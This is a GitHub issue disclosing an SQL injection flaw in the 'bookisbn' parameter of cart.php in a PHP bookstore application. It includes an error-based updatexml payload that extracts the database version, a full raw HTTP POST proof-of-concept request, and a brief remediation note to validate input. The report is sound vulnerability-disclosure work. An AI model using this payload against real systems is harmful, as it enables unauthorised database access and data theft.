Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection vulnerability via the "bookisbn" parameter in cart.php #18

Open
khanhchauminh opened this issue Oct 30, 2021 · 0 comments

Comments

@khanhchauminh
Copy link

khanhchauminh commented Oct 30, 2021

Author

KhanhCM (@khanhchauminh)

Version: 1.0

Steps to reproduce

  1. Go to any book detail page by clicking on that book's image.
  2. Click on "Purchase / Add to cart" button.
  3. Intercept the request and insert the payload in the value of the bookisbn parameter.

Example payload:

' or updatexml(1,concat(0x7e,(version())),0) -- a

Proof-of-concept

POST /cart.php HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 137
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.89.145:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1:8888/book.php?bookisbn=978-1-49192-706-9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=2vmimaak7ho1ccnj624a5js0lq
Connection: close

bookisbn=978-1-49192-706-9%27%20or%20updatexml%281%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20--%20a&cart=Purchase+%2F+Add+to+cart

Response in Burpsuite

image

Source code review

cart.php

image

functions/cart_functions.php

image

functions/database_functions.php

image

Remediation

Validate input of bookisbn parameter in cart.php.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant